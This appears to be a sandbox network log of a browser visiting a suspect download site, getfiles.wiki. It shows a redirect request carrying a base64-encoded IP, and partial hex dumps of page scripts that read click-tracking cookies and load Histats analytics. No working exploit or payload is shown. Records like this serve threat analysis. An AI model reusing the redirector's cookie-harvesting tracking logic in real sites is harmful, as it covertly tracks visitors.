2023-03-21 12:20:48 UTC	8	OUT	GET /redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg= HTTP/1.1 Host: getfiles.wiki Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://getfiles.wiki/redirect.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-03-21 12:20:49 UTC	9	IN	HTTP/1.1 200 OK Date: Tue, 21 Mar 2023 12:20:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding,User-Agent x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gYqrcU9I1wwOrd5e8swhaVcMoQyAgloRDFZSbq5OerRuoi5cr9cJI2zlOwKuQ%2B3%2B%2BJ031oDKFUf0o%2Bj1eATwknFKQcuFypQb7FRM1R7TJa6UcTcPUrPVZbC7VOa4rzOp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7ab626ae4c4f9b21-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-21 12:20:49 UTC	10	IN	Data Raw: 64 65 39 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 62 6f 64 79 20 7b 0d 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 30 Data Ascii: de9<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"><style>body { background-color: #0000
2023-03-21 12:20:49 UTC	10	IN	Data Raw: 2c 7b 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 72 28 72 29 7b 76 6f 69 64 20 30 3d 3d 3d 72 26 26 28 72 3d 22 75 63 6c 69 63 6b 22 29 3b 76 61 72 20 63 2c 74 2c 75 3d 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 22 75 63 6c 69 63 6b 22 29 2c 41 72 72 61 79 2e 66 72 6f 6d 28 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 6d 61 74 63 68 41 6c 6c 28 6e 65 77 20 52 65 67 45 78 70 28 22 28 3f 3a 5e 7c 3b 20 29 28 63 6c 69 63 6b 69 64 7c 22 2b 6e 2b 22 29 3d 28 5b 5e 3b 5d 2a 29 22 2c 22 67 22 29 29 29 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 7b 6e 61 6d 65 3a 6e 5b 31 5d 2c 76 61 6c 75 65 3a 6e 5b 32 5d 7d 7d 29 29 Data Ascii: ,{})}function r(r){void 0===r&&(r="uclick");var c,t,u=e((function(){return(function(n){return void 0===n&&(n="uclick"),Array.from(document.cookie.matchAll(new RegExp("(?:^\|; )(clickid\|"+n+")=([^;]*)","g"))).map((function(n){return{name:n[1],value:n[2]}}))
2023-03-21 12:20:49 UTC	12	IN	Data Raw: 20 76 6f 69 64 20 30 3d 3d 3d 6e 26 26 28 6e 3d 22 75 63 6c 69 63 6b 22 29 2c 41 72 72 61 79 2e 66 72 6f 6d 28 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 6d 61 74 63 68 41 6c 6c 28 6e 65 77 20 52 65 67 45 78 70 28 22 28 3f 3a 5e 7c 3b 20 29 28 63 6c 69 63 6b 69 64 7c 22 2b 6e 2b 22 29 3d 28 5b 5e 3b 5d 2a 29 22 2c 22 67 22 29 29 29 2e 6d 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 7b 6e 61 6d 65 3a 6e 5b 31 5d 2c 76 61 6c 75 65 3a 6e 5b 32 5d 7d 7d 29 29 7d 29 28 72 29 7d 29 29 2c 69 3d 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 2c 72 29 7d 29 29 2c 6f 3d 65 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 28 64 6f 63 75 6d 65 6e 74 2e 6c Data Ascii: void 0===n&&(n="uclick"),Array.from(document.cookie.matchAll(new RegExp("(?:^\|; )(clickid\|"+n+")=([^;]*)","g"))).map((function(n){return{name:n[1],value:n[2]}}))})(r)})),i=e((function(){return n(document.referrer,r)})),o=e((function(){return n(document.l
2023-03-21 12:20:49 UTC	13	IN	Data Raw: 2e 68 69 73 74 61 74 73 2e 63 6f 6d 2f 30 2e 67 69 66 3f 34 37 30 38 37 38 37 26 31 30 31 22 20 61 6c 74 3d 22 77 65 62 20 6c 6f 67 20 66 72 65 65 22 20 62 6f 72 64 65 72 3d 22 30 22 3e 3c 2f 61 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 20 48 69 73 74 61 74 73 2e 63 6f 6d 20 20 45 4e 44 20 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: .histats.com/0.gif?4708787&101" alt="web log free" border="0"></a></noscript>... Histats.com END --></html>
2023-03-21 12:20:49 UTC	13	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	kBytes transferred	Direction	Data
2023-03-21 12:20:49 UTC	13	OUT	GET /js15_as.js HTTP/1.1 Host: s10.histats.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg= Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-03-21 12:20:49 UTC	14	IN	HTTP/1.1 200 OK Date: Tue, 21 Mar 2023 12:11:45 GMT Last-Modified: Thu, 16 Apr 2020 10:44:16 GMT X-Request-ID: 158761696 Content-Type: text/javascript Vary: Accept-Encoding ETag: W/"-375139978" X-CDN-Pop: sbg X-CDN-Pop-IP: 137.74.120.0/27 X-Cacheable: Matched cache Accept-Ranges: bytes Content-Length: 11440 Connection: close
2023-03-21 12:20:49 UTC	14	IN	Data Raw: 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 74 21 3d 3d 6e 7d 2c 65 3d 22 6a 73 31 35 5f 61 73 2e 6a 73 22 2c 72 3d 22 22 2c 69 3d 21 31 2c 6f 3d 21 31 2c 61 3d 21 31 2c 73 3d 21 31 2c 63 3d 22 30 2e 32 2e 31 22 2c 75 3d 32 35 2c 5f 3d 22 2d 22 2c 66 3d 22 5f 48 49 53 54 41 54 53 5f 53 49 44 22 2c 64 3d 22 68 69 73 74 61 74 73 5f 63 75 73 74 6f 6d 5f 64 65 73 74 44 69 76 50 72 6f 64 75 63 65 72 22 2c 70 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 5f 2b 3d 22 5f 22 2b 6e 7d 3b 70 28 63 29 3b 76 61 72 20 76 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 26 26 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d Data Ascii: (function(){var n="undefined",t=function(t){return typeof t!==n},e="js15_as.js",r="",i=!1,o=!1,a=!1,s=!1,c="0.2.1",u=25,_="-",f="_HISTATS_SID",d="histats_custom_destDivProducer",p=function(n){_+="_"+n};p(c);var v=function(){i&&console.log.apply(this,argum